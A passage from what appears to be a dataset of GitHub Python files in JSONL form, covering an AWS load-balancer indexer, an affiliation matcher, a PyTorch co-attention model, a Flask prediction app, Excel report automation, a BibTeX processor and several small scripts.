)","repo_name":"phytter/search-engine-server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23571933527","text":"from ..aws import region_names\nfrom app.es import client\n\nELB_NAME = {\n 'elb': 'LoadBalancerDescriptions',\n 'elbv2': 'LoadBalancers',\n}\n\ndef get_load_balancers(session):\n for elb_version in ('elb', 'elbv2'):\n for region_name in region_names:\n client = session.client(elb_version, region_name=region_name)\n paginator = client.get_paginator('describe_load_balancers')\n for page in paginator.paginate():\n for load_balancer in page[ELB_NAME[elb_version]]:\n yield (elb_version, region_name, load_balancer)\n\n\ndef import_elb_infos(key):\n session = key.get_boto_session()\n for version, region, lb in get_load_balancers(session):\n doc = {\n 'linked_account_id': key.get_aws_user_id(),\n 'name': lb['LoadBalancerName'],\n 'region': region,\n }\n if version == 'elb':\n doc['instances'] = ' '.join([instance['InstanceId'] for instance in lb['Instances']])\n elif version == 'elbv2':\n doc['instances'] = ''\n client.index(index='awselbinfo', doc_type='a_ws_el_binfo', body=doc, ttl='18h', timeout='120s', request_timeout=120)\n","repo_name":"trackit/trackit-legacy","sub_path":"api/files/api/app/aws/elb.py","file_name":"elb.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41860388105","text":"import requests\nimport fasttext\nfrom predictor import Predictor\nfrom urllib.parse import quote\n\nPREDICTOR = Predictor('../models/')\n\ndef query_affiliation(affiliation):\n chosen_id = None\n affiliation_encoded = quote(affiliation)\n url = f\"https://api.ror.org/organizations?affiliation={affiliation_encoded}\"\n r = requests.get(url)\n if r.ok:\n api_response = r.json()\n results = api_response['items']\n if results != []:\n for result in results:\n if result['chosen']:\n chosen_id = result['organization']['id']\n return chosen_id\n\n\ndef ensemble_match(affiliation, confidence=0.8):\n fasttext_prediction = PREDICTOR.predict_ror_id(affiliation, confidence)\n if fasttext_prediction is not None:\n return fasttext_prediction\n else:\n affiliation_prediction = query_affiliation(affiliation)\n if affiliation_prediction is not None:\n return affiliation_prediction\n\n\nif __name__ == '__main__':\n print(ensemble_match('Department of Engineering, University of Michigan, Ann Arbor, MI 48103'))","repo_name":"adambuttrick/ensemble_matching","sub_path":"ensemble_matching.py","file_name":"ensemble_matching.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26160383400","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nfrom torch.nn.utils import rnn as rnn_utils\nfrom attention import MultiHeadAttention\nfrom transformers import CamembertModel, CamembertConfig, FlaubertConfig, FlaubertModel, \\\n XLMRobertaConfig, XLMRobertaModel, BertModel, BertConfig\n\n\nclass CoAttention(nn.Module):\n \"\"\"Co-Attention Architecture\"\"\"\n\n def __init__(self, ques_enc_params, img_enc_params, K, mlp_dim=512):\n super().__init__()\n self.hidden_dim = ques_enc_params['hidden_dim']\n self.image_encoder = ImageCoAttentionEncoder(**img_enc_params)\n self.question_encoder = QuestionCoAttentionEncoder.create(**ques_enc_params)\n self.co_attention = CoAttention(self.hidden_dim)\n self.mlp_classify = FeedForward(self.hidden_dim, mlp_dim, K)\n\n def forward(self, x_img, x_input_id, x_input_mask, x_input_type_ids):\n # Word features\n x_word = self.question_encoder(x_input_id, x_input_mask, x_input_type_ids) # [batch, max_seq_len, hidden_dim]\n # Question Features ([word])\n x_ques_features = [x_word] # [batch, max_seq_len, hidden_dim]\n # Image Features\n x_img_features = self.image_encoder(x_img) # [batch, spatial_locs, hidden_dim]\n # Attention weighted image & question features\n x_img_attn, x_ques_attn = self.co_attention(x_img_features, x_ques_features) # [B, hid_dim], [B, hid_dim]\n # Predict Answer (logits)\n x_logits = self.mlp_classify(x_img_attn, x_ques_attn) # [batch_size, K]\n\n return x_logits\n\n\nclass ImageCoAttentionEncoder(nn.Module):\n\n\n def __init__(self, is_require_grad):\n super(ImageCoAttentionEncoder, self).__init__()\n\n self.is_require_grad = is_require_grad\n\n # Resnet Encoder\n self.resnet_encoder = self.build_resnet_encoder()\n\n # Flatten the feature map grid [B, D, H, W] --> [B, D, H*W]\n self.flatten = nn.Flatten(start_dim=2, end_dim=3)\n\n\n def forward(self, x_img):\n x_feat_map = self.resnet_encoder(x_img)\n\n # Flatten (16 x 16 x 2048) --> (16*16, 2048)\n x_feat = self.flatten(x_feat_map)\n\n x_feat = x_feat.permute(0, 2, 1) # [batch_size, spatial_locs, 2048]\n\n return x_feat\n\n def build_encoder(self):\n \"\"\"\n Given Resnet backbone, build the encoder network from all layers except the last 2 layers.\n\n :return: model (nn.Module)\n \"\"\"\n resnet = models.resnet152(pretrained=True)\n\n modules = list(resnet.children())[:-2]\n\n resnet_encoder = nn.Sequential(*modules)\n\n for param in resnet_encoder.parameters():\n param.requires_grad = self.is_require_grad\n\n return resnet_encoder\n\n\n\nclass QuestionCoAttentionEncoder(nn.Module):\n \"\"\"\n Encode question phrases using BERT based embeddings\n and apply an BILSTM to encode the question.\n \"\"\"\n def __init__(self, config, model, lstm,attn):\n super(QuestionCoAttentionEncoder, self).__init__()\n\n self.configuration = config\n self.model = model\n self.lstm = lstm\n self.attn = attn\n if self.configuration['mode'] == \"weighted\":\n self.bert_weights = torch.nn.Parameter(torch.FloatTensor(12, 1))\n self.bert_gamma = torch.nn.Parameter(torch.FloatTensor(1, 1))\n self.init_weights()\n\n def init_weights(self):\n if self.configuration[\"mode\"] == \"weighted\":\n torch.nn.init.xavier_normal(self.bert_gamma)\n torch.nn.init.xavier_normal(self.bert_weights)\n\n\n @classmethod\n def create(cls,\n model_type ='camem',\n model_name =\"camembert-base\",\n embedding_size = 768,\n hidden_dim = 512,\n rnn_layers = 1,\n lstm_dropout = 0.5,\n device=\"cuda\",\n mode=\"weighted\",\n key_dim=64,\n val_dim=64,\n num_heads=3,\n attn_dropout=0.3,\n self_attention=False,\n is_require_grad=False):\n configuration = {\n 'model_type' : model_type,\n \"model_name\": model_name,\n \"device\": device,\n \"mode\": mode,\n \"self_attention\":self_attention,\n \"is_freeze\": is_require_grad\n }\n\n if 'camem' in model_type:\n config_bert = CamembertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = CamembertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'flaubert' in model_type:\n config_bert = FlaubertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = FlaubertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'XLMRoberta' in model_type:\n config_bert = XLMRobertaConfig.from_pretrained(model_name, output_hidden_states=True)\n model = XLMRobertaModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n elif 'M-Bert' in model_type:\n config_bert = BertConfig.from_pretrained(model_name, output_hidden_states=True)\n model = BertModel.from_pretrained(model_name, config=config_bert)\n model.to(device)\n\n lstm = BiLSTM.create(embedding_size=embedding_size, hidden_dim=hidden_dim, rnn_layers=rnn_layers, dropout=lstm_dropout)\n\n attn = MultiHeadAttention(key_dim, val_dim, hidden_dim, num_heads, attn_dropout)\n model.train()\n self = cls(model=model, config=configuration, lstm=lstm,attn=attn)\n # if is_freeze:\n self.freeze()\n\n return self\n\n def freeze(self):\n \n for param in self.model.parameters():\n param.requires_grad = self.configuration['is_freeze']\n\n def forward(self, x_input_id, x_input_mask, x_input_type_ids):\n\n if 'camem' in self.configuration['model_type']:\n encoded_layers, _, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n elif 'flaubert' in self.configuration['model_type']:\n encoded_layers, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n elif 'XLMRoberta' in self.configuration['model_type']:\n encoded_layers,_, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n elif 'M-Bert' in self.configuration['model_type']:\n encoded_layers,_, all_layer_embeddings = self.model(input_ids = x_input_id,\n token_type_ids = x_input_type_ids,\n attention_mask= x_input_mask)\n\n\n\n if self.configuration[\"mode\"] == \"weighted\":\n encoded_embeddings = torch.stack([a * b for a, b in zip(all_layer_embeddings, self.bert_weights)])\n input_embeddings = self.bert_gamma * torch.sum(encoded_embeddings, dim=0)\n else:\n input_embeddings = encoded_layers[-1, :, :, :]\n output, _ = self.lstm.forward(input_embeddings, x_input_mask)\n if self.configuration['self_attention']:\n output, _ = self.attn(output, output, output, None)\n return output\n\n\nclass BiLSTM(nn.Module):\n\n def __init__(self, embedding_size=768, hidden_dim=512, rnn_layers=1, dropout=0.5):\n super(BiLSTM, self).__init__()\n self.embedding_size = embedding_size\n self.hidden_dim = hidden_dim\n self.rnn_layers = rnn_layers\n self.dropout = nn.Dropout(dropout)\n self.lstm = nn.LSTM(\n embedding_size,\n hidden_dim // 2,\n rnn_layers, batch_first=True, bidirectional=True)\n\n def forward(self, input_, input_mask):\n length = input_mask.sum(-1)\n sorted_lengths, sorted_idx = torch.sort(length, descending=True)\n input_ = input_[sorted_idx]\n packed_input = rnn_utils.pack_padded_sequence(input_, sorted_lengths.data.tolist(), batch_first=True)\n self.lstm.flatten_parameters()\n output, (hidden, _) = self.lstm(packed_input)\n padded_outputs = rnn_utils.pad_packed_sequence(output, batch_first=True)[0]\n _, reversed_idx = torch.sort(sorted_idx)\n return padded_outputs[reversed_idx], hidden[:, reversed_idx]\n\n @classmethod\n def create(cls, *args, **kwargs):\n return cls(*args, **kwargs)\n\n\n\nclass CoAttention(nn.Module):\n \"\"\"\n Implements Co-Attention mechanism\n given image & question features.\n \"\"\"\n def __init__(self, hidden_dim):\n super().__init__()\n self.hidden_dim = hidden_dim\n # Affinity layer\n self.W_b = nn.Linear(self.hidden_dim, self.hidden_dim)\n # Attention layers\n self.W_v = nn.Linear(self.hidden_dim, self.hidden_dim)\n self.W_q = nn.Linear(self.hidden_dim, self.hidden_dim)\n self.w_v = nn.Linear(self.hidden_dim, 1)\n self.w_q = nn.Linear(self.hidden_dim, 1)\n\n def forward(self, x_img, x_ques_hierarchy):\n img_feats = []\n quest_feats = []\n\n for x_ques in x_ques_hierarchy:\n Q = x_ques # [batch_size, max_seq_len, hidden_dim]\n V = x_img.permute(0, 2, 1) # [batch_size, hidden_dim, spatial_locs]\n\n # Affinity matrix\n C = F.tanh(torch.bmm(Q, V)) # [batch_size, max_seq_len, spatial_locs]\n ##Tranpose the image spatial matrix\n V = V.permute(0, 2, 1) # [batch_size, spatial_locs, hidden_dim]\n\n H_v = F.tanh(self.W_v(V) + # [batch_size, spatial_locs, hidden_dim]\n torch.bmm(C.transpose(2, 1), self.W_q(Q)))\n\n H_q = F.tanh(self.W_q(Q) + # [batch_size, max_seq_len, hidden_dim]\n torch.bmm(C, self.W_v(V)))\n\n # Attention weights\n a_v = F.softmax(self.w_v(H_v), dim=1) # [batch_size, spatial_locs, 1]\n a_q = F.softmax(self.w_q(H_q), dim=1) # [batch_size, max_seq_len, 1]\n\n # Compute attention-weighted features\n v = torch.sum(a_v * V, dim=1) # [batch_size, hidden_dim]\n q = torch.sum(a_q * Q, dim=1) # [batch_size, hidden_dim]\n\n img_feats.append(v)\n quest_feats.append(q)\n\n return img_feats, quest_feats # 3*[batch, hidden_dim], 3*[batch, hidden_dim]\n\n\nclass FeedForward(nn.Module):\n \"\"\"\n Feed forward neural network that concatenates the image and word attention weights\n \"\"\"\n def __init__(self, hidden_dim, K):\n super().__init__()\n\n self.W_w = nn.Linear(hidden_dim, hidden_dim)\n # self.batch_norm = nn.BatchNorm1d(hidden_dim)\n self.W_h = nn.Linear(hidden_dim, K)\n\n def forward(self, x_img_feats, x_ques_feats):\n q_w = x_ques_feats[0] # [batch_size, hidden_dim]\n v_w = x_img_feats [0] # [batch_size, hidden_dim]\n h_w = F.tanh(self.W_w(q_w + v_w)) # [batch_size, hidden_dim]\n # Final answer (classification logit)\n # logit = self.W_h(self.batch_norm(h_w)) # [batch_size, K]\n\n logit = self.W_h(h_w)\n return logit\n\n","repo_name":"VarnithChordia/Multimodal_Classification_Co_Attention","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12177,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"23403125391","text":"import math\r\n\r\ndef sqr(i):\r\n return i*i\r\n\r\nN, M, K = 0, 0, 0\r\n\r\ndef factor(x):\r\n global N\r\n rest = x\r\n result = []\r\n for i in reversed(range(2, M + 1)):\r\n while (rest % i) == 0:\r\n rest = rest // i\r\n result.append(i)\r\n if rest == 1:\r\n break\r\n \r\n return result\r\n\r\ndef mergeRes(r, append):\r\n remainder = r[:]\r\n result = r[:]\r\n for i in append:\r\n if i in remainder:\r\n remainder.remove(i)\r\n else:\r\n result.append(i)\r\n \r\n return result\r\n \r\n \r\ndef solveCase(c):\r\n global N, M, K\r\n\r\n result = [] # [0 for i in range(1, K)]\r\n \r\n for x in c:\r\n append = factor(x)\r\n result = mergeRes(result, append)\r\n print('x,a,c', x, append, result)\r\n \r\n l = len(result)\r\n if l < N:\r\n result.extend([2 for i in range(0, N - l)])\r\n \r\n string = ''\r\n for i in result:\r\n string = string + str(i)\r\n print(string)\r\n \r\n return string\r\n\r\n\r\n\r\ndef solve(sourceFile, resultFile):\r\n global N, M, K\r\n\r\n s = open(sourceFile)\r\n res = open(resultFile, 'w')\r\n\r\n t = int(s.readline())\r\n \r\n r, N, M, K = [int(i) for i in s.readline().split()]\r\n print('n,k,m', N, K, M)\r\n\r\n header = 'Case #1: \\n'\r\n res.write(header)\r\n for n in range(1, r + 1):\r\n string = s.readline()\r\n case = [int(i) for i in string.split()]\r\n res.write(solveCase(case) + '\\n')\r\n \r\n return\r\n \r\ndef main():\r\n source = 'C-small-1-attempt1.in'\r\n result = source + '.result.txt'\r\n solve(source, result)\r\n return\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_122/167.py","file_name":"167.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"750538489","text":"# import serial\n\n# ser = serial.Serial('COM5', 9600, timeout=0.050)\n\n# while 1:\n# while ser.in_waiting:\n# data_in = ser.readline()\n# print (data_in)\n\nimport serial\nfrom time import sleep\n\nser = serial.Serial (\"COM5\", 9600) #Open port with baud rate\nwhile True:\n received_data = ser.read() #read serial port\n sleep(0.03)\n data_left = ser.inWaiting() #check for remaining byte\n received_data += ser.read(data_left)\n print (received_data) #print received data\n # ser.write(received_data) ","repo_name":"zeynabT/cansat","sub_path":"uart/uart.py","file_name":"uart.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38292748703","text":"import logging\r\nlogging.basicConfig(filename = \"list.log\", level = logging.DEBUG , format= '%(asctime)s %(levelname)s %(message)s')\r\n\r\nclass List:\r\n logging.info(\"We are into list class\")\r\n\r\n def reverse(self):\r\n \"The fun is used to reverse list\"\r\n l= [3,4,5,6,7,[23,456,67,8,78,78],[345,56,87,8,98,9], (234,6657,6), {\"key1\": \"atha\", 234:[23,45,656]}]\r\n logging.info(\"We are into 1st function\")\r\n\r\n try:\r\n l.reverse()\r\n logging.info(\"The reverse of this list is %s\", l)\r\n return l\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n\r\n\r\n def Even(self):\r\n \"The fun is used to find even in list\"\r\n l= [1,2,3,4,5,6,7,8]\r\n logging.info(\"We are into 2nd function\")\r\n\r\n try:\r\n\r\n for i in l:\r\n if i%2==0:\r\n logging.info(\"The number %s is even\", i)\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n\r\n def Odd(self):\r\n \"The fun is used to find off in list\"\r\n l= [1,2,3,4,7,9,11,13,15]\r\n logging.info(\"We are into 3rd function\")\r\n\r\n try:\r\n\r\n for i in l:\r\n if i%2!=0:\r\n logging.info(\"The number %s is odd\", i)\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n def Print_ineuron(self):\r\n \"The fun prints ineuron\"\r\n l= [[1,2,3,4],(2,3,4,5,6),(3,4,5,6,7), set([23,4,5,45,4,4,5,45,45,4,5]),{'k1':\"sudh\",\"k2\":\"ineuron\", \"k3\": \"kumar\", 3:6,7:8},[\"ineuron\",\"data science\"]]\r\n\r\n logging.info(\"We are into 4th function\")\r\n\r\n try:\r\n for i in l:\r\n if type(i)== dict:\r\n for j in i.items():\r\n for g in j:\r\n if g== \"ineuron\":\r\n logging.info(\"The result is %s\", g)\r\n\r\n\r\n if type(i)== list:\r\n for k in i:\r\n if k== \"ineuron\":\r\n logging.info(\"The result is %s and %s\", k, g)\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n def product(self):\r\n \"The fun gives the product\"\r\n l = [[1, 2, 3, 4], (2, 3, 4, 5, 6), (3, 4, 5, 6, 7), set([23, 4, 5, 45, 4, 4, 5, 45, 45, 4, 5]),\r\n {'k1': \"sudh\", \"k2\": \"ineuron\", \"k3\": \"kumar\", 3: 6, 7: 8}, [\"ineuron\", \"data science\"]]\r\n\r\n logging.info(\"We are into 5th function\")\r\n\r\n try:\r\n j=1\r\n for i in l:\r\n if type(i)== list or type(i)== tuple:\r\n for k in i:\r\n if type(k)== int:\r\n j= j*k\r\n logging.info(\"The product is %s\", j)\r\n\r\n except Exception as e:\r\n logging.exception(e)\r\n\r\n\r\n\r\ncall= List()\r\ncall.reverse()\r\ncall.Even()\r\ncall.Odd()\r\ncall.Print_ineuron()\r\ncall.product()\r\n","repo_name":"AtharvOO1/AtharvOO1","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75248015554","text":"import sys\nimport csv\nimport pywintypes\nimport win32com.client as win32\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import messagebox\n\n\n\ndef aggr_counts(input_file):\n\t# read in VOIDDATE.TXT file to get counts.\n\tdata = [row for row in input_file]\n\t#print len(data)\n\tkey_dict = {}\n\tfor row in data:\n\t\t# get original key from pos.366(4)\n\t\torig_key = row[365:369]\n\t\t# get package code from pos. 278(3)\n\t\tpackage = row[277:280]\n\t\t# add keys/quantities to dictionary if there are non ZLD records\n\t\tif package != 'ZLD':\n\t\t\tif orig_key in key_dict:\n\t\t\t\tkey_dict[orig_key] += 1\n\t\t\telse:\n\t\t\t\tkey_dict[orig_key] = 1\n\treturn key_dict\n\ndef get_broker_codes(list):\n\trow = 4\n\tlol_dict = {}\n\tkey_cell = 'x'\n\twhile key_cell != 'None':\n\t\tkey_cell = str(list.Cells(row,4))\n\t\tkey_cell = key_cell.strip()\n\t\tbroker_cell = str(list.Cells(row,3))\n\t\tbroker_cell = broker_cell.strip()\n\t\t#print(key_cell, broker_cell)\n\t\tif key_cell in lol_dict:\n\t\t\tpass\n\t\telse:\n\t\t\tif broker_cell != 'SUPP' and broker_cell != 'None':\n\t\t\t\tlol_dict[key_cell] = broker_cell\n\t\trow += 1\n\tprint(lol_dict)\n\treturn lol_dict\n\n\n\ndef populate_excel(input_file,broker_report,list_of_lists):\n\t#read in list of lists\n\ttry:\n\t\tlol = excel.Workbooks.Open(list_of_lists)\n\texcept:\n\t\tprint(\"Failed to open list of lists\")\n\t\tsys.exit(1)\n\tlols = lol.Sheets('List of Lists')\n\tlol_dict = get_broker_codes(lols)\n\tlol.Close(True)\n\t#read in excel file\n\ttry:\n\t\twb = excel.Workbooks.Open(broker_report)\n\texcept:\n\t\tprint(\"Failed to open broker report\")\n\t\tsys.exit(1)\n\tws = wb.Sheets('PURGE DROPS')\n\tws.Range(\"D1\").EntireColumn.Clear()\n\tws.Range(\"L1\").EntireColumn.Delete()\n\tws.Range(\"L1\").EntireColumn.Delete()\n\tws.Range(\"C1\").EntireColumn.Insert()\n\tkey_dict = aggr_counts(input_file)\n\tval = ''\n\t# first usefull row in excel sheet is A7\n\trow = 7\n\t# add column header to output column\n\tws.Cells(4,14).Value = 'QTY'\n\tws.Cells(5,14).Value = 'MAILED'\n\t# add column header to broker column\n\tws.Cells(5,3).Value = 'VENDER'\n\tws.Cells(5,5).Value = 'REJECTS'\n\t# add column header to adj qty\n\tws.Cells(4,13).Value = 'ADJ'\n\tws.Cells(5,13).Value = 'QTY'\n\t# loop through keycodes\n\twhile val != 'TOTALS':\n\t\tval = ws.Cells(row,1).Value\n\t\t#print 'val: ', val\n\t\tif val != None:\n\t\t\tval = val.strip()\n\t\t# add quantity of non ZLD records on output, if any.\n\t\tif val in key_dict:\n\t\t\tws.Cells(row,14).Value = key_dict[val]\n\t\t\tws.Cells(row,3).Value = lol_dict[val]\n\t\t\tws.Cells(row,5).Value = ws.Cells(row,13).Value - ws.Cells(row,14).Value\n\t\trow += 1\n\trow = row - 1\n\ttotal_sum = '=SUM(O7:O' + str(row - 2) + ')'\n\t#ws.Cells(row,14).Formula = '=SUM(N7:N' + str(row - 2) + ')'\n\n\t# format cells with font, size, alignment\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).Font.Name = \"Courier\"\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).Font.Size = 8\n\tws.Range(ws.Cells(4,14),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\t#ws.Range(ws.Cells(5,14),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\t#ws.Range(ws.Cells(5,14),ws.Cells(row,3)).NumberFormat = \"###,##0\"\n\n\tws.Cells(row,5).Formula = '=SUM(E7:E' + str(row - 2) + ')'\n\tws.Range(ws.Cells(4,13),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\tws.Range(ws.Cells(5,13),ws.Cells(row,3)).HorizontalAlignment = win32.constants.xlRight\n\tws.Columns.AutoFit()\n\t# delete DE INPUT column\n\tws.Range(\"F1\").EntireColumn.Delete()\n\t# delete TOTALS row\n\tws.Rows(row).EntireRow.Delete()\n\twb.Close(True)\n\texcel.Quit()\n\n\n\n\n\nexcel = win32.gencache.EnsureDispatch('Excel.Application')\nexcel.Visible = True\n\n# output_file_name = sys.argv[1]\n# broker_report = sys.argv[2]\n# prevent root window from appearing on screen\nroot = tk.Tk()\nroot.withdraw()\n# select voiddate file dialog box\nmessagebox.showinfo(message = \"Select the voiddate.txt file:\")\noutput_file_name = filedialog.askopenfilename()\nprint('voiddate file: ', output_file_name)\n# select broker report file dialog box\nmessagebox.showinfo(message = \"Select the EXCEL.XLS file:\")\nbroker_report = filedialog.askopenfilename()\nprint('broker_report: ', broker_report)\n# select list of lists file dialog box\nmessagebox.showinfo(message = \"Select the list of lists file:\")\nlist_of_lists = filedialog.askopenfilename()\nprint('list_of_lists: ', list_of_lists)\n\nwith open(output_file_name, 'r') as input_file:\n populate_excel(input_file, broker_report,list_of_lists)\n","repo_name":"casssax/mic_broker","sub_path":"mic_broker.py","file_name":"mic_broker.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36448046368","text":"from flask import Flask, request, jsonify, redirect, url_for, render_template\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\n\napp = Flask(__name__)\n\n# Carregar e processar os dados\ndf = pd.read_excel('datateste1.xlsx')\ncolumns_to_drop = [\n \"BDNF (pg/mL)\", \"Irisin (ng/mL)\", \"FABP3 (pg/mL)\", \"FABP4 (pg/mL)\", \"Oxytocin (pg/mL)\",\n \"Leptin (pg/mL)\", \"IL-8 (pg/mL)\", \"IL-6 (pg/mL)\", \"IP10 (pg/mL)\", \"MCP1 (pg/mL)\",\n \"MIP1b (pg/mL)\", \"RANTES (pg/mL)\", \"VEGF (pg/mL)\", \"Pan-ApoE (ug/mL)\", \"ApoE4 (ug/mL)\",\n \"ApoE4/ApoE (Pan-ApoE)\", \"ApoE4 pheno (type)\", \"Ab42/Ab40\", \"Noradrenaline (ng/mL)\",\n \"L-Dopa\", \"Dopamine\", \"Dopac\", \"5-HIAA\", \"HVA\", \"Serotonine\", \"HVA/DA\", \"Dopac+HVA/DA\",\n \"5-HIAA/5-HT\", \"Glutamate (μM)\", \"Glutamine\", \"Taurine\", \"Arginine\", \"GABA\",\n \"Glutamate/GABA\", \"Glutamine/ Glutamate\", \"A7/A5\", \"MMSE\", \"Ab/tau\", \"Glutamine/ GABA\",\n \"Lipoxin A4 (pg/mL)\", \"Cys-LT (pg/mL)\", \"LXA4/cys-LT\", \"GABA/ Glutamate\",\n \"Total protein (mg/mL)\", \"Subjects\"\n]\ndf.drop(columns_to_drop, axis=1, inplace=True)\ndf.drop([25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 53, 54, 55, 56, 57, 58, 59, 60, 61], inplace=True)\n\nX = df.iloc[:, 1:5].values\nPrevisor = df.iloc[:, 5:6].values\n\nx_treinamento, x_teste, y_treinamento, y_teste = train_test_split(X, Previsor, test_size=0.30, random_state=7)\n\nsc = StandardScaler()\nx_treinamento = sc.fit_transform(x_treinamento)\nx_teste = sc.transform(x_teste)\n\nmodel = RandomForestClassifier()\nmodel.fit(x_treinamento, y_treinamento.ravel())\n\n@app.route('/calculate', methods=['POST'])\ndef calculate():\n data = request.get_json()\n proteina1 = data['proteina1']\n proteina2 = data['proteina2']\n proteina3 = data['proteina3']\n values = sc.transform([[proteina1, proteina2, proteina3]])\n prediction = model.predict(values)[0]\n return jsonify({\"prediction\": prediction})\n\n@app.route('/results.html')\ndef show_result():\n prediction = request.args.get('prediction')\n return render_template('results.html', prediction=prediction)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Toribrrs/Site_da_IC","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26879748646","text":"#! /usr/bin/python3\n\n# System imports\nimport argparse\nimport re\n\n# Package imports\nfrom bibtexparser.bparser import BibTexParser\nfrom bibtexparser.customization import convert_to_unicode, author, editor, page_double_hyphen\n\n\ndef customizations(record):\n \"\"\"Use some functions delivered by the library\n\n :param record: a record\n :returns: -- customized record\n \"\"\"\n record = convert_to_unicode(record)\n # record = type(record)\n record = author(record)\n record = editor(record)\n # record = journal(record) # Do not use!\n # record = keyword(record)\n # record = link(record)\n record = page_double_hyphen(record)\n # record = doi(record)\n return record\n\n\ndef load_bibtex(bibfile, customizer=None):\n # Open and parse the BibTeX file in `bibfile` using\n # `bibtexparser`\n with open(bibfile, 'r') as bib_file:\n bp = BibTexParser(bib_file.read(), customization=customizer)\n\n # Get a dictionary of dictionaries of key, value pairs from the\n # BibTeX file. The structure is\n # {ID:{authors:...},ID:{authors:...}}.\n refsdict = bp.get_entry_dict()\n\n return refsdict\n\n\nclass Processor:\n def __init__(self, refsdict):\n self.refsdict = refsdict\n # Check that all references have populated author, title and year fields\n for k, v in self.refsdict.items():\n assert 'author' in v or 'editor' in v, 'Missing field author/editor in {}'.format(k)\n assert 'title' in v, 'Missing field title in {}'.format(k)\n assert 'year' in v, 'Missing field year in {}'.format(k)\n\n def gen_replacement(self, match, skip_types=None):\n match_type = self.get_match_type(match.group())\n if skip_types is not None and match_type in skip_types:\n return None, None\n else:\n func = getattr(self, 'process_' + match_type, None)\n if func is not None:\n if match_type == 'multicite':\n match_strings = [string.strip() for string in match.group()[1:-1].split(';')]\n refIDs = [self.get_reference_ID(match_string) for match_string in match_strings]\n for refID in refIDs:\n assert refID in self.refsdict, 'Reference {} not found'.format(refID)\n return func([self.refsdict[refID] for refID in refIDs])\n else:\n refID = self.get_reference_ID(match.group())\n assert refID in self.refsdict, 'Reference {} not found'.format(refID)\n return func(self.refsdict[refID])\n return None, None\n\n def get_match_type(self, match_string):\n match_string = match_string.strip()\n if ';' in match_string and ':cite' in match_string:\n return 'multicite'\n elif ':cite' in match_string:\n return 'cite'\n else:\n assert ('@' in match_string and ':' in match_string and '[' in match_string and ']' in match_string), \\\n 'match_string must contain an at-symbol, a colon, a left and a right square bracket.'\n pos_colon = match_string.find(':')\n pos_rbracket = match_string.find(']')\n return match_string[pos_colon + 1 : pos_rbracket].strip()\n\n def get_reference_ID(self, match_string):\n match_string = match_string.strip()\n assert ('@' in match_string and ':' in match_string), \\\n 'match_string must contain an at-symbol and a colon.'\n pos_colon = match_string.find(':')\n pos_at = match_string.find('@')\n return match_string[pos_at + 1 : pos_colon].strip()\n\n def process_title(self, ref):\n if 'url' in ref:\n return '[' + ref['title'] + '](' + ref['url'] + ')', None \n else:\n return ref['title'], None \n\n def process_subtitle(self, ref):\n return ref.get('subtitle', None), None\n\n def process_journal(self, ref):\n return ref.get('journal', None), None\n\n def process_author(self, ref):\n if ref['ENTRYTYPE'].lower() == 'book' and 'editor' in ref:\n authors_list = [editor['name'] for editor in ref['editor']]\n else:\n authors_list = ref['author']\n num_authors = len(authors_list)\n if num_authors == 1:\n return authors_list[0].split(',')[0].strip(), None\n elif num_authors == 2:\n return authors_list[0].split(',')[0].strip() + \\\n ' and ' + authors_list[1].split(',')[0].strip(), None\n elif num_authors >= 3:\n return authors_list[0].split(',')[0].strip() + ' *et al.*', None\n\n def process_authors(self, ref):\n if ref['ENTRYTYPE'].lower() == 'book' and 'editor' in ref:\n authors_list = 